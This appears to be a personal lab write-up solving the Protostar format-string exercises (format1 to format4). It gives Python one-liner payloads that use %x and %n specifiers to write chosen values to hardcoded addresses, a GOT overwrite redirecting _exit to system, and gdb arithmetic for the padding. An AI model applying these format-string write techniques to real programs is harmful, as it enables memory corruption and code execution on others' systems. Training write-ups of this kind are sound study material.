Exploit Exercises - Format String

Format1:
Padding to last mem dump
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%x
Write
run `python -c 'print "\x38\x96\x04\x08"+"AAABB"+"%x."*143'`%n
DMA
/opt/protostar/bin/format1 `python -c 'print "CC"+"\x38\x96\x04\x08"+"AAA%142$n"'`
Format2 need write value to address:
POC:
python -c 'print "\xe4\x96\x04\x08%42x"+"%x."*2+"%n"' > foo
|Address|Value|Padding|%n

DMA
python -c 'print "\xe4\x96\x04\x08"+"%60u%4$n"' | /opt/protostar/bin/format2

Format3: write 4 byte with speacify address:

POC:

python -c 'print "\xf4\x96\x04\x08"+"%x"*10+"%11x%n"+"BB"+"\xf5\x96\x04\x08"+"%x"*6+"%475x%n"+"B"+"\xf6\x96\x04\x08"+"%x"*4+"%136x%n"+"B"+"\xf7\x96\x04\x08"+"%x"*3+"%482x%n"'

Format 4: We need overwrite GOT table.

--> Overwrite _exit() address with system() address

python -c 'print "\x24\x97\x04\x08"+"\x25\x97\x04\x08"+"\x26\x97\x04\x08"+"\x27\x97\x04\x08"+"%164x%4$n%208x%5$n%128x%6$n%260x%7$n"' > pro4_dma

Nice trick to caculate address

user@protostar:/opt/protostar/bin$ gdb -q

(gdb) p 0xb4 - 0x00000010

$1 = 164

(gdb) p 0x84 - 0xb4

$2 = -48

(gdb) p 0x184 - 0xb4

$3 = 208

(gdb) p 0x04 - 0x84

$4 = -128

(gdb) p 0x104 - 0x84

$5 = 128

(gdb) p 0x08 - 0x04

$6 = 4

(gdb) p 0x108 - 0x04

$7 = 260

Get value of this address to overwrite and sub.

----------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
SecurityLab - Linux Lab -- Window and Cisco Lab
to be continued - I will update more.

Nam Habach